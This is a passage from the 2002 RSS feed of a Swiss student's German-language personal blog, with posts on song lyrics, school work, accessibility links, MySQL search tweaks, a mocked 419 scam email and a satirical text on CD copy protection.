  14929.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14930.    <pubDate>Sun, 27 Oct 2002 22:20:00 +0000</pubDate>
  14931.    <category domain="https://blog.x-way.org/Music">Music</category>
  14932.    <description><![CDATA[<a href="http://www.inextremo.de/"><b>SPIELMANNSFLUCH</b></a><br><br>Es war einmal ein König an Land und Dingen reich<br>Der saß auf seinem Throne finster und bleich<br>Was er sinnt ist Schrecken, was er blickt ist Wut<br>Was er spricht ist Geißel, was er schreibt ist Blut<br><br>Einst zog zu diesem Schlosse ein edles Sängerpaar<br>Einer hat schwarze Locken, der andre ist grau von Haar<br>Der Graue sprach zum Jungen: "Sei bereit mein Sohn,<br>Spiel die besten Lieder, stimm an den vollsten Ton!"<br><br>Es regnet, es regnet Blut<br>Es regnet den Spielmannsfluch<br><br>Es spielen die beiden Sänger im hohen Säulensaal<br>Auf dem Throne sitzt das Königspaar<br>Der König so prächtig wie blutiger Nordenschein<br>Die Königin so süß wie der Sonnenschein<br><br>Sie singen von Lenz, Liebe, Heiligkeit<br>Sie zerfloss in Wehmut, Lust war auch dabei<br>Ihr habt mein Volk geblendet, verlangt ihr nun mein Weib?<br>Der König schreit wütend, er bebt am ganzen Leib<br><br>Es regnet, es regnet Blut ...<br><br>Des Königs Schwert blitzend des Jünglings Brust durchdringt<br>Statt der goldnen Lieder nun ein Blutstrahl springt<br>Der Jüngling hat verröchelt in seines Meisters Arm<br>Dann schreit der Alte schaurig, der Marmorsaal zerspringt<br><br>Du verfluchter Mörder, du Fluch des Spielmanns Tun<br>Umsonst sei all dein Ringen, mit Blut befleckt dein Tun<br>Des Königs Namen meldet kein Lied, kein Heldenbuch<br>Versunken und vergessen- das ist des Spielmanns Fluch<br><br>Es regnet, es regnet Blut ...
  14933. ]]></description>
  14934.    <content:encoded><![CDATA[<a href="http://www.inextremo.de/"><b>SPIELMANNSFLUCH</b></a><br><br>Es war einmal ein König an Land und Dingen reich<br>Der saß auf seinem Throne finster und bleich<br>Was er sinnt ist Schrecken, was er blickt ist Wut<br>Was er spricht ist Geißel, was er schreibt ist Blut<br><br>Einst zog zu diesem Schlosse ein edles Sängerpaar<br>Einer hat schwarze Locken, der andre ist grau von Haar<br>Der Graue sprach zum Jungen: "Sei bereit mein Sohn,<br>Spiel die besten Lieder, stimm an den vollsten Ton!"<br><br>Es regnet, es regnet Blut<br>Es regnet den Spielmannsfluch<br><br>Es spielen die beiden Sänger im hohen Säulensaal<br>Auf dem Throne sitzt das Königspaar<br>Der König so prächtig wie blutiger Nordenschein<br>Die Königin so süß wie der Sonnenschein<br><br>Sie singen von Lenz, Liebe, Heiligkeit<br>Sie zerfloss in Wehmut, Lust war auch dabei<br>Ihr habt mein Volk geblendet, verlangt ihr nun mein Weib?<br>Der König schreit wütend, er bebt am ganzen Leib<br><br>Es regnet, es regnet Blut ...<br><br>Des Königs Schwert blitzend des Jünglings Brust durchdringt<br>Statt der goldnen Lieder nun ein Blutstrahl springt<br>Der Jüngling hat verröchelt in seines Meisters Arm<br>Dann schreit der Alte schaurig, der Marmorsaal zerspringt<br><br>Du verfluchter Mörder, du Fluch des Spielmanns Tun<br>Umsonst sei all dein Ringen, mit Blut befleckt dein Tun<br>Des Königs Namen meldet kein Lied, kein Heldenbuch<br>Versunken und vergessen- das ist des Spielmanns Fluch<br><br>Es regnet, es regnet Blut ...
  14935. ]]></content:encoded>
  14936.  </item>
  14937.  
  14938.  <item>
  14939.    <title>Sachen gibt's</title>
  14940.    <link>https://blog.x-way.org/School/2002/10/27/Sachen_gibts.html</link>
  14941.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=130</guid>
  14942.    <dc:creator>Andreas Jaggi</dc:creator>
  14943.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14944.    <pubDate>Sun, 27 Oct 2002 21:14:00 +0000</pubDate>
  14945.    <category domain="https://blog.x-way.org/School">School</category>
  14946.    <description><![CDATA[Im Bildnerischen Gestalten (auch bekannt als Zeichnen;) dürfen wir <a href="https://web.archive.org/web/20021008164020/http://theochem.chem.rug.nl/~heijnen/Kienholz/MGW/MGW.html"><b>dieses Kunstwerk</b></a> beschreiben. Und das auf <b>4</b> A4-Seiten (maschinengeschrieben, versteht sich)! Zudem dürfen wir auch noch fünf Piktogramme kreieren, die in einem Flüchtlingslager eingesetzt werden können, jeglicher Gebrauch von Schrift ist natürlich strengstens verboten.<br><br>Um den Lehrer nicht so schlecht dastehen zu lassen muss folgendes noch gesagt werden:<br>Für das ganze haben wir nun schon mehr als 2 Monate Zeit (inklusive 1 Monat Ferien) und wir haben während dieser Zeit das Zeichnen fehlen dürfen, um zu Hause am Computer zu arbeiten, weil die PC's in der Schule voll die Kacke sind ;-)
  14947. ]]></description>
  14948.    <content:encoded><![CDATA[Im Bildnerischen Gestalten (auch bekannt als Zeichnen;) dürfen wir <a href="https://web.archive.org/web/20021008164020/http://theochem.chem.rug.nl/~heijnen/Kienholz/MGW/MGW.html"><b>dieses Kunstwerk</b></a> beschreiben. Und das auf <b>4</b> A4-Seiten (maschinengeschrieben, versteht sich)! Zudem dürfen wir auch noch fünf Piktogramme kreieren, die in einem Flüchtlingslager eingesetzt werden können, jeglicher Gebrauch von Schrift ist natürlich strengstens verboten.<br><br>Um den Lehrer nicht so schlecht dastehen zu lassen muss folgendes noch gesagt werden:<br>Für das ganze haben wir nun schon mehr als 2 Monate Zeit (inklusive 1 Monat Ferien) und wir haben während dieser Zeit das Zeichnen fehlen dürfen, um zu Hause am Computer zu arbeiten, weil die PC's in der Schule voll die Kacke sind ;-)
  14949. ]]></content:encoded>
  14950.  </item>
  14951.  
  14952.  <item>
  14953.    <title>Pour que je ne l'oublie pas</title>
  14954.    <link>https://blog.x-way.org/Misc/2002/10/27/Pour_que_je_ne_loublie_pas.html</link>
  14955.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=129</guid>
  14956.    <dc:creator>Andreas Jaggi</dc:creator>
  14957.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14958.    <pubDate>Sun, 27 Oct 2002 02:57:00 +0000</pubDate>
  14959.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14960.    <description><![CDATA[<a href="https://web.archive.org/web/20021019220621/http://iquebec.ifrance.com/bloghappy/"><b>BLOG shadow</b></a> est un journaux en français.
  14961. ]]></description>
  14962.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20021019220621/http://iquebec.ifrance.com/bloghappy/"><b>BLOG shadow</b></a> est un journaux en français.
  14963. ]]></content:encoded>
  14964.  </item>
  14965.  
  14966.  <item>
  14967.    <title>J'écris aussi en français!</title>
  14968.    <link>https://blog.x-way.org/Webdesign/2002/10/27/Jecris_aussi_en_francais.html</link>
  14969.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=128</guid>
  14970.    <dc:creator>Andreas Jaggi</dc:creator>
  14971.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14972.    <pubDate>Sun, 27 Oct 2002 02:38:00 +0000</pubDate>
  14973.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  14974.    <description><![CDATA[J'ai annoncé <a href="http://waterwave.ch/weblog/detail.php?id=127"><b>ici</b></a> que j'écris maintenant aussi en français. Je le fais pour entraîner mes connaissances du français. <br><span style="color: #FF0000;">Le but c'est d'augmenter mes notes en français et en histoire bilingue</span>.<br><br>Voilà mon premier lien français: <a href="https://web.archive.org/web/20021125021714/http://www.fkgb.fr/"><b>fkgb.fr</b></a> est une "agence de communication" situé à Paris avec une site très multimédiale ;-)
  14975. ]]></description>
  14976.    <content:encoded><![CDATA[J'ai annoncé <a href="http://waterwave.ch/weblog/detail.php?id=127"><b>ici</b></a> que j'écris maintenant aussi en français. Je le fais pour entraîner mes connaissances du français. <br><span style="color: #FF0000;">Le but c'est d'augmenter mes notes en français et en histoire bilingue</span>.<br><br>Voilà mon premier lien français: <a href="https://web.archive.org/web/20021125021714/http://www.fkgb.fr/"><b>fkgb.fr</b></a> est une "agence de communication" situé à Paris avec une site très multimédiale ;-)
  14977. ]]></content:encoded>
  14978.  </item>
  14979.  
  14980.  <item>
  14981.    <title>Kleine Änderungen</title>
  14982.    <link>https://blog.x-way.org/Coding/2002/10/27/Kleine_Aenderungen.html</link>
  14983.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=127</guid>
  14984.    <dc:creator>Andreas Jaggi</dc:creator>
  14985.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14986.    <pubDate>Sun, 27 Oct 2002 02:10:00 +0000</pubDate>
  14987.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  14988.    <description><![CDATA[Ich hab wieder gebastelt ;-)<br>Nun ist es möglich für jeden Eintrag die Kommentarfunktion einzeln auszuschalten. Zudem hab ich vor, ab jetzt auch in Französisch zu schreiben, damit meine Franznote etwas besser wird durchs Üben. Daher hat sich MySQL-mässig auch da noch etwas geändert. Vielleicht werde ich einmal eine Abfrage mit Cookies oder so einrichten, mit der man dann nur eine Sprache anzeigen lassen kann; damit ihr nicht leiden müsst ;-)
  14989. ]]></description>
  14990.    <content:encoded><![CDATA[Ich hab wieder gebastelt ;-)<br>Nun ist es möglich für jeden Eintrag die Kommentarfunktion einzeln auszuschalten. Zudem hab ich vor, ab jetzt auch in Französisch zu schreiben, damit meine Franznote etwas besser wird durchs Üben. Daher hat sich MySQL-mässig auch da noch etwas geändert. Vielleicht werde ich einmal eine Abfrage mit Cookies oder so einrichten, mit der man dann nur eine Sprache anzeigen lassen kann; damit ihr nicht leiden müsst ;-)
  14991. ]]></content:encoded>
  14992.  </item>
  14993.  
  14994.  <item>
  14995.    <title>Des Rätsels Lösung</title>
  14996.    <link>https://blog.x-way.org/Coding/2002/10/27/Des_Raetsels_Loesung.html</link>
  14997.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=126</guid>
  14998.    <dc:creator>Andreas Jaggi</dc:creator>
  14999.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15000.    <pubDate>Sun, 27 Oct 2002 00:04:00 +0000</pubDate>
  15001.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  15002.    <description><![CDATA[Die Antwort auf die <a href="http://waterwave.ch/weblog/detail.php?id=115"><b>hier</b></a> gestellte Frage lautet:<br>Damit ich Google-Suchabfragen-Links erkennen kann, und mit <pre>header("Location: suche.php?q=".$GoogleQuery);</pre> umleiten kann. Weshalb das? Damit die Links von Google, welche manchmal auf Einträge zeigen, die nicht mehr auf der index.php sind, für den Benutzer doch etwas bringen.
  15003. ]]></description>
  15004.    <content:encoded><![CDATA[Die Antwort auf die <a href="http://waterwave.ch/weblog/detail.php?id=115"><b>hier</b></a> gestellte Frage lautet:<br>Damit ich Google-Suchabfragen-Links erkennen kann, und mit <pre>header("Location: suche.php?q=".$GoogleQuery);</pre> umleiten kann. Weshalb das? Damit die Links von Google, welche manchmal auf Einträge zeigen, die nicht mehr auf der index.php sind, für den Benutzer doch etwas bringen.
  15005. ]]></content:encoded>
  15006.  </item>
  15007.  
  15008.  <item>
  15009.    <title>Nun ist so wie's sein muss!</title>
  15010.    <link>https://blog.x-way.org/Webdesign/2002/10/26/Nun_ist_so_wies_sein_muss.html</link>
  15011.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=125</guid>
  15012.    <dc:creator>Andreas Jaggi</dc:creator>
  15013.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15014.    <pubDate>Sat, 26 Oct 2002 15:13:00 +0000</pubDate>
  15015.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  15016.    <description><![CDATA[<a href="http://waterwave.ch"><b>waterwave.ch</b></a> ist nun XHTML 1.0 konform und in punkto Accessibility auch nicht schlecht gestellt.<br><br><a href="https://validator.w3.org/check?uri=http://waterwave.ch/"><img src="https://www.w3.org/Icons/valid-xhtml10" alt="Valid XHTML 1.0!" height="31" width="88"></a><br><br>Ich wäre froh, wenn jemand mit einer Software wie <a href="http://www.freedomscientific.com/fs_products/software_jaws.asp">JAWS</a> mal schauen könnte, ob waterwave.ch noch Probleme darstellt.<br>Sonstige Accesibility-Tips sind natürlich auch willkommen ;-)
  15017. ]]></description>
  15018.    <content:encoded><![CDATA[<a href="http://waterwave.ch"><b>waterwave.ch</b></a> ist nun XHTML 1.0 konform und in punkto Accessibility auch nicht schlecht gestellt.<br><br><a href="https://validator.w3.org/check?uri=http://waterwave.ch/"><img src="https://www.w3.org/Icons/valid-xhtml10" alt="Valid XHTML 1.0!" height="31" width="88"></a><br><br>Ich wäre froh, wenn jemand mit einer Software wie <a href="http://www.freedomscientific.com/fs_products/software_jaws.asp">JAWS</a> mal schauen könnte, ob waterwave.ch noch Probleme darstellt.<br>Sonstige Accesibility-Tips sind natürlich auch willkommen ;-)
  15019. ]]></content:encoded>
  15020.  </item>
  15021.  
  15022.  <item>
  15023.    <title>Accessibility zum 2.</title>
  15024.    <link>https://blog.x-way.org/Webdesign/2002/10/25/Accessibility_zum_2.html</link>
  15025.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=124</guid>
  15026.    <dc:creator>Andreas Jaggi</dc:creator>
  15027.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15028.    <pubDate>Fri, 25 Oct 2002 00:47:00 +0000</pubDate>
  15029.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  15030.    <description><![CDATA[Nun ist <a href="http://waterwave.ch"><b>waterwave.ch</b></a> HTML 4.01 und CSS 2 konform. Zudem hab ich mich durch den <a href="https://web.archive.org/web/20021029124142/https://diveintoaccessibility.org/"><b>Dive into Accessibility</b></a> Guide gewühlt und einige Sachen daraus entnommen. Nur das Kontakt-Formular und die Abkürzungen müssen noch bearbeitet werden.<br>Ergänzungen?<br><br><a href="https://validator.w3.org/check?uri=http://waterwave.ch"><img src="https://www.w3.org/Icons/valid-html401" alt="Valid HTML 4.01!" height="31" width="88"></a>  <a href="https://jigsaw.w3.org/css-validator/validator?uri=http://waterwave.ch"><img style="border:0;width:88px;height:31px" src="https://jigsaw.w3.org/css-validator/images/vcss" alt="Valid CSS!"></a>
  15031. ]]></description>
  15032.    <content:encoded><![CDATA[Nun ist <a href="http://waterwave.ch"><b>waterwave.ch</b></a> HTML 4.01 und CSS 2 konform. Zudem hab ich mich durch den <a href="https://web.archive.org/web/20021029124142/https://diveintoaccessibility.org/"><b>Dive into Accessibility</b></a> Guide gewühlt und einige Sachen daraus entnommen. Nur das Kontakt-Formular und die Abkürzungen müssen noch bearbeitet werden.<br>Ergänzungen?<br><br><a href="https://validator.w3.org/check?uri=http://waterwave.ch"><img src="https://www.w3.org/Icons/valid-html401" alt="Valid HTML 4.01!" height="31" width="88"></a>  <a href="https://jigsaw.w3.org/css-validator/validator?uri=http://waterwave.ch"><img style="border:0;width:88px;height:31px" src="https://jigsaw.w3.org/css-validator/images/vcss" alt="Valid CSS!"></a>
  15033. ]]></content:encoded>
  15034.  </item>
  15035.  
  15036.  <item>
  15037.    <title>Accessibility!</title>
  15038.    <link>https://blog.x-way.org/Webdesign/2002/10/24/Accessibility.html</link>
  15039.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=123</guid>
  15040.    <dc:creator>Andreas Jaggi</dc:creator>
  15041.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15042.    <pubDate>Thu, 24 Oct 2002 22:50:00 +0000</pubDate>
  15043.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  15044.    <description><![CDATA[Damit ja niemandem langweilig wird:<br><br><a href="http://www.makoa.org/web-design.htm"><b>Accessible Web Page Design</b></a><br>
  15045. <a href="https://web.archive.org/web/20021022001554/http://aware.hwg.org/"><b>AWARE</b></a><br>
  15046. <a href="https://web.archive.org/web/20021028041713/http://www-3.ibm.com/able/index.html"><b>IBM Accessibility Center</b></a><br>
  15047. <a href="http://www.raggedcastle.com/andyjw/blogaccess.htm"><b>Weblog Accessibility</b></a><br>
  15048. <a href="https://web.archive.org/web/20021014020123/https://joeclark.org/access/"><b>Joe Clark: Media Access</b></a><br>
  15049. <a href="http://www.jimthatcher.com/webcourse1.htm"><b>Web Accessibility for Section 508</b></a><br>
  15050. <a href="https://web.archive.org/web/20021015022522/http://oc.nci.nih.gov/web508/index.html"><b>NCI Web Accessibility and 508 Compliance Initiative</b></a><br>
  15051. <a href="https://web.archive.org/web/20021105045448/https://www.starlingweb.com/webac.htm"><b>Accessible Web design - a definition</b></a><br>
  15052. <a href="http://www.usableweb.com/"><b>Usable Web</b></a><br>
  15053. <a href="https://web.archive.org/web/20021010195554/http://www.washington.edu/doit/Resources/web-design.html"><b>Accessible Web Design </b></a><br>
  15054. <a href="https://web.archive.org/web/20091121155457/http://webdesign.about.com/od/accessibility/Web_Accessibility_Web_Usability.htm"><b>Web Accessibility - ADA Guidelines</b></a><br>
  15055. <a href="https://web.archive.org/web/20021002001249/https://knowbility.org/curriculum/"><b>Accessible Web Page Design Curriculum</b></a><br>
  15056. <a href="https://web.archive.org/web/20021029124142/https://diveintoaccessibility.org/"><b>Dive Into Accessibility</b></a>
  15057. ]]></description>
  15058.    <content:encoded><![CDATA[Damit ja niemandem langweilig wird:<br><br><a href="http://www.makoa.org/web-design.htm"><b>Accessible Web Page Design</b></a><br>
  15059. <a href="https://web.archive.org/web/20021022001554/http://aware.hwg.org/"><b>AWARE</b></a><br>
  15060. <a href="https://web.archive.org/web/20021028041713/http://www-3.ibm.com/able/index.html"><b>IBM Accessibility Center</b></a><br>
  15061. <a href="http://www.raggedcastle.com/andyjw/blogaccess.htm"><b>Weblog Accessibility</b></a><br>
  15062. <a href="https://web.archive.org/web/20021014020123/https://joeclark.org/access/"><b>Joe Clark: Media Access</b></a><br>
  15063. <a href="http://www.jimthatcher.com/webcourse1.htm"><b>Web Accessibility for Section 508</b></a><br>
  15064. <a href="https://web.archive.org/web/20021015022522/http://oc.nci.nih.gov/web508/index.html"><b>NCI Web Accessibility and 508 Compliance Initiative</b></a><br>
  15065. <a href="https://web.archive.org/web/20021105045448/https://www.starlingweb.com/webac.htm"><b>Accessible Web design - a definition</b></a><br>
  15066. <a href="http://www.usableweb.com/"><b>Usable Web</b></a><br>
  15067. <a href="https://web.archive.org/web/20021010195554/http://www.washington.edu/doit/Resources/web-design.html"><b>Accessible Web Design </b></a><br>
  15068. <a href="https://web.archive.org/web/20091121155457/http://webdesign.about.com/od/accessibility/Web_Accessibility_Web_Usability.htm"><b>Web Accessibility - ADA Guidelines</b></a><br>
  15069. <a href="https://web.archive.org/web/20021002001249/https://knowbility.org/curriculum/"><b>Accessible Web Page Design Curriculum</b></a><br>
  15070. <a href="https://web.archive.org/web/20021029124142/https://diveintoaccessibility.org/"><b>Dive Into Accessibility</b></a>
  15071. ]]></content:encoded>
  15072.  </item>
  15073.  
  15074.  <item>
  15075.    <title>Ich bin reich!</title>
  15076.    <link>https://blog.x-way.org/Misc/2002/10/24/Ich_bin_reich.html</link>
  15077.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=122</guid>
  15078.    <dc:creator>Andreas Jaggi</dc:creator>
  15079.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15080.    <pubDate>Thu, 24 Oct 2002 15:23:00 +0000</pubDate>
  15081.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  15082.    <description><![CDATA[Ich hab gerade 20% von US$ 32'000'000 als Angebot von <a href="mailto:isa_50@go.com"><b>Isa Bamaiyi</b></a>erhalten, wenn ich denn Rest via mein Konto in Sicherheit bringe. Denkste, dass ich die 80% zurückzahlen werde ;-)<br>Und das schönste daran: weil ich so gut bin, erhalte ich das Angebot von 4 anderen Isa Bamaiyis auch noch. Also 32'000'000 x 5 gibt schon ein nettes kleines Vermögen ;-)<br><br>Und wers immernoch glaubt, der schaue bitte <a href="http://nigeria-connection.de/"><b>hier</b></a>.<br><br>Nachtrag:<br>Den ganzen "Brief" kann man <a href="http://www.nigeria-connection.de/bamaiyi_isa.html"><b>hier</b></a> finden.
  15083. ]]></description>
  15084.    <content:encoded><![CDATA[Ich hab gerade 20% von US$ 32'000'000 als Angebot von <a href="mailto:isa_50@go.com"><b>Isa Bamaiyi</b></a>erhalten, wenn ich denn Rest via mein Konto in Sicherheit bringe. Denkste, dass ich die 80% zurückzahlen werde ;-)<br>Und das schönste daran: weil ich so gut bin, erhalte ich das Angebot von 4 anderen Isa Bamaiyis auch noch. Also 32'000'000 x 5 gibt schon ein nettes kleines Vermögen ;-)<br><br>Und wers immernoch glaubt, der schaue bitte <a href="http://nigeria-connection.de/"><b>hier</b></a>.<br><br>Nachtrag:<br>Den ganzen "Brief" kann man <a href="http://www.nigeria-connection.de/bamaiyi_isa.html"><b>hier</b></a> finden.
  15085. ]]></content:encoded>
  15086.  </item>
  15087.  
  15088.  <item>
  15089.    <title>Kopierschutz</title>
  15090.    <link>https://blog.x-way.org/Misc/2002/10/24/Kopierschutz.html</link>
  15091.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=121</guid>
  15092.    <dc:creator>Andreas Jaggi</dc:creator>
  15093.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15094.    <pubDate>Thu, 24 Oct 2002 13:47:00 +0000</pubDate>
  15095.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  15096.    <description><![CDATA[<a href="https://web.archive.org/web/20021125172825/http://raphb.ch/"><b>raphb</b></a> hat einen interessanten/amüsanten Text in seinem Weblog veröffentlicht ;-)<br><br><a href="https://web.archive.org/web/20030413170149/http://raphb.ch/pub_files/humor/universal-kopierschutz.txt"><i>"[...] Was soll ich in Zukunft tun ? Einen CD-Brenner und ein Crackprogramm beschaffen,
  15097. das den Kopierschutz ignoriert ? Dateien grundsaetzlich aus dem Netz ziehen ?
  15098. Den Minidisk-Recorder an den Kopfhoererausgang im Plattenladen anschliessen ?
  15099. Neue Scheiben nicht mehr kaufen, alte dafuer kopieren ? Das Radioprogramm auf
  15100. Festplatte mitschneiden lassen und hinterher sortieren ? Was auch immer ich
  15101. davon waehle, Plattenfirmen und Kuenstler werden mich als zahlenden Kunden
  15102. verlieren. [...]"</i></a>
  15103. ]]></description>
  15104.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20021125172825/http://raphb.ch/"><b>raphb</b></a> hat einen interessanten/amüsanten Text in seinem Weblog veröffentlicht ;-)<br><br><a href="https://web.archive.org/web/20030413170149/http://raphb.ch/pub_files/humor/universal-kopierschutz.txt"><i>"[...] Was soll ich in Zukunft tun ? Einen CD-Brenner und ein Crackprogramm beschaffen,
  15105. das den Kopierschutz ignoriert ? Dateien grundsaetzlich aus dem Netz ziehen ?
  15106. Den Minidisk-Recorder an den Kopfhoererausgang im Plattenladen anschliessen ?
  15107. Neue Scheiben nicht mehr kaufen, alte dafuer kopieren ? Das Radioprogramm auf
  15108. Festplatte mitschneiden lassen und hinterher sortieren ? Was auch immer ich
  15109. davon waehle, Plattenfirmen und Kuenstler werden mich als zahlenden Kunden
  15110. verlieren. [...]"</i></a>
  15111. ]]></content:encoded>
  15112.  </item>
  15113.  
  15114.  <item>
  15115.    <title>Monster</title>
  15116.    <link>https://blog.x-way.org/School/2002/10/24/Monster.html</link>
  15117.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=120</guid>
  15118.    <dc:creator>Andreas Jaggi</dc:creator>
  15119.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15120.    <pubDate>Thu, 24 Oct 2002 00:21:00 +0000</pubDate>
  15121.    <category domain="https://blog.x-way.org/School">School</category>
  15122.    <description><![CDATA[Wie soll man an der Maturaprüfung in 3 Stunden einen Aufsatz schreiben, wenn man jetzt 1.5 Stunden in der Schule braucht, um nur die Überschrift zu schreiben?!<br>Wer schon einen Aufsatz zum Thema Monster geschrieben hat, darf ihn mir auch mailen ;-)
  15123. ]]></description>
  15124.    <content:encoded><![CDATA[Wie soll man an der Maturaprüfung in 3 Stunden einen Aufsatz schreiben, wenn man jetzt 1.5 Stunden in der Schule braucht, um nur die Überschrift zu schreiben?!<br>Wer schon einen Aufsatz zum Thema Monster geschrieben hat, darf ihn mir auch mailen ;-)
  15125. ]]></content:encoded>
  15126.  </item>
  15127.  
  15128.  <item>
  15129.    <title>Momentan im Ohr</title>
  15130.    <link>https://blog.x-way.org/Music/2002/10/23/Momentan_im_Ohr.html</link>
  15131.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=119</guid>
  15132.    <dc:creator>Andreas Jaggi</dc:creator>
  15133.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15134.    <pubDate>Wed, 23 Oct 2002 05:29:00 +0000</pubDate>
  15135.    <category domain="https://blog.x-way.org/Music">Music</category>
  15136.    <description><![CDATA[<a href="https://web.archive.org/web/20021214000000/http://attaque77.com/"><b>Attaque 77 - Dame Fuego</b></a>
  15137. ]]></description>
  15138.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20021214000000/http://attaque77.com/"><b>Attaque 77 - Dame Fuego</b></a>
  15139. ]]></content:encoded>
  15140.  </item>
  15141.  
  15142.  <item>
  15143.    <title>Rätselt!</title>
  15144.    <link>https://blog.x-way.org/Coding/2002/10/20/Raetselt.html</link>
  15145.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=118</guid>
  15146.    <dc:creator>Andreas Jaggi</dc:creator>
  15147.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15148.    <pubDate>Sun, 20 Oct 2002 19:09:00 +0000</pubDate>
  15149.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  15150.    <description><![CDATA[Das mit dem GET und dem POST hat übrigens auch etwas mit dem google zu tun.<br>Jetzt sollt's eigentlich Klick machen ;-)
  15151. ]]></description>
  15152.    <content:encoded><![CDATA[Das mit dem GET und dem POST hat übrigens auch etwas mit dem google zu tun.<br>Jetzt sollt's eigentlich Klick machen ;-)
  15153. ]]></content:encoded>
  15154.  </item>
  15155.  
  15156.  <item>
  15157.    <title>MySQL Full-text Search</title>
  15158.    <link>https://blog.x-way.org/Coding/2002/10/20/MySQL_Full-text_Search.html</link>
  15159.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=117</guid>
  15160.    <dc:creator>Andreas Jaggi</dc:creator>
  15161.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15162.    <pubDate>Sun, 20 Oct 2002 17:18:00 +0000</pubDate>
  15163.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  15164.    <description><![CDATA[... will nicht wie ich!<br>Nach <a href="http://waterwave.ch/weblog/detail.php?id=116"><b>diesem</b></a> Tipp von <a href="http://robwei.de"><b>rw</b></a> habe ich meine Suchfunktion noch einmal neu gebaut. Durfte jedoch feststellen, dass dabei keine Wörter mit weniger als 4 Zeichen funktionieren und dass nur Wörter verglichen werden, jedoch nicht Wortteile.<br>Also hab ich wieder zurückgewechselt und die MySQL-Queries noch länger gemacht, damit jetzt auch die Titel der einzelnen Beiträge durchsucht werden.
  15165. ]]></description>
  15166.    <content:encoded><![CDATA[... will nicht wie ich!<br>Nach <a href="http://waterwave.ch/weblog/detail.php?id=116"><b>diesem</b></a> Tipp von <a href="http://robwei.de"><b>rw</b></a> habe ich meine Suchfunktion noch einmal neu gebaut. Durfte jedoch feststellen, dass dabei keine Wörter mit weniger als 4 Zeichen funktionieren und dass nur Wörter verglichen werden, jedoch nicht Wortteile.<br>Also hab ich wieder zurückgewechselt und die MySQL-Queries noch länger gemacht, damit jetzt auch die Titel der einzelnen Beiträge durchsucht werden.
  15167. ]]></content:encoded>
  15168.  </item>
  15169.  
  15170.  <item>
  15171.    <title>Tüftel, tüftel</title>
  15172.    <link>https://blog.x-way.org/Coding/2002/10/20/Tueftel_tueftel.html</link>
  15173.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=116</guid>
  15174.    <dc:creator>Andreas Jaggi</dc:creator>
  15175.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15176.    <pubDate>Sun, 20 Oct 2002 02:22:00 +0000</pubDate>
  15177.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  15178.    <description><![CDATA[Nun werden die Suchergebnisse nach Häufigkeit der Treffer sortiert, sowie doppelte Treffer entfernt.<br>Diese 25 Zeilen Code, an denen ich jetzt sicher 1.5 Stunden gebaut habe, kann man für 10 Euro käuflich erwerben; damit ich den Kaffee bezahlen kann ;-)
  15179. ]]></description>
  15180.    <content:encoded><![CDATA[Nun werden die Suchergebnisse nach Häufigkeit der Treffer sortiert, sowie doppelte Treffer entfernt.<br>Diese 25 Zeilen Code, an denen ich jetzt sicher 1.5 Stunden gebaut habe, kann man für 10 Euro käuflich erwerben; damit ich den Kaffee bezahlen kann ;-)
  15181. ]]></content:encoded>
  15182.  </item>
  15183.  
  15184.  <item>
  15185.    <title>Sucht!</title>
  15186.    <link>https://blog.x-way.org/Coding/2002/10/20/Sucht.html</link>
  15187.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=115</guid>
  15188.    <dc:creator>Andreas Jaggi</dc:creator>
